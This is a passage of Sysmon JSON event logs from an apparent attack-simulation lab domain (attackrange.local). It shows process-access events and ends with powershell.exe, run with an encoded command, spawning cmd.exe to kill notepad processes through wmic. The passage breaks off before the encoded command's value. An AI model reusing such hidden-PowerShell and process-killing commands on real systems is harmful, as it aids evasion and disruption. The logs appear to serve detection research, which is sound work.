C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.424","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5752,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.424\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.424","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5753,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.424\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.424","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5754,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.424\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.424","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5755,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.424\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.424","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5756,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.424\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.424","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5757,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.424\r\nSourceProcessGUID: {41C8662E-20D8-5F25-0000-001089080900}\r\nSourceProcessId: 1052\r\nSourceThreadId: 4312\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-0010CD2E0900}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15601843)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.424","SourceProcessGUID":"{41C8662E-20D8-5F25-0000-001089080900}","SourceProcessId":"1052","SourceThreadId":"4312","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-0010CD2E0900}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15601843)","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5758,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.424\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-00105BE20800}\r\nSourceProcessId: 1592\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-0010CD2E0900}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.424","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-00105BE20800}","SourceProcessId":"1592","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-0010CD2E0900}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5759,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.460\r\nProcessGuid: {41C8662E-20D9-5F25-0000-0010E52F0900}\r\nProcessId: 4428\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"wmic process where name='notepad.exe' delete >nul 2>&1\" \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20D7-5F25-0000-0020ADE10800}\r\nLogonId: 0x8E1AD\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-20D8-5F25-0000-001089080900}\r\nParentProcessId: 1052\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand 